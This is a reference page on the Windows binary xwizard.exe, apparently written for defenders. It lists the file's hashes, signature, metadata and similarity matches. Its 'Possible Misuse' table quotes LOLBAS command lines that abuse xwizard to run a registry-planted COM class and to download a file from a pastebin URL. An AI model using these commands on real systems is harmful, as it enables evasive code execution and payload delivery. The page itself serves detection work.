xwizard.exe

  • File Path: C:\Windows\SysWOW64\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 3C70F039EE4C07511ABD82B5664FB91B
SHA1 52C040C88F8D7653BEB0F85F82BA610AF73C99B9
SHA256 16065D6FA9502FE13E8FC1E8ED2FC07842F33E45D19C369C721DFCAD9AEF5A28
SHA384 877B50C4F0DD63F63DFFFAA08BEFDB8D2F234DB2F37467F27801E973F02008F0BD12098E033F6286ECD3CA8888677640
SHA512 979DE327D129C2272781812D3AE03A8FB7A9CB52C3E41A13078992E9B9E7DB45AC6B5232A81B57C1109B9B12FD5E552AFB5B0A84860AE08B1ED2C1951F60E69D
SSDEEP 768:o5ObzBwv/bqaWLtpJwzh/rIo8YeTWs2IkRDzsq4ytZZZL2YCX4ib:o4KvGaiwVTIo18URDoq4OZZZLlCIib

Signature

  • Status: Signature verified.
  • Serial: 33000000BCE120FDD27CC8EE930000000000BC
  • Thumbprint: E85459B23C232DB3CB94C7A56D47678F58E8E51E
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 10.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 57
C:\WINDOWS\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 69
C:\Windows\system32\ComputerDefaults.exe 52
C:\Windows\system32\xwizard.exe 54
C:\windows\system32\xwizard.exe 58
C:\Windows\system32\xwizard.exe 49
C:\WINDOWS\system32\xwizard.exe 50
C:\Windows\system32\xwizard.exe 58
C:\windows\SysWOW64\ComputerDefaults.exe 63
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\ComputerDefaults.exe 68
C:\Windows\SysWOW64\ComputerDefaults.exe 55
C:\Windows\SysWOW64\ComputerDefaults.exe 50
C:\Windows\SysWOW64\xwizard.exe 63
C:\windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 61
C:\WINDOWS\SysWOW64\xwizard.exe 63

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.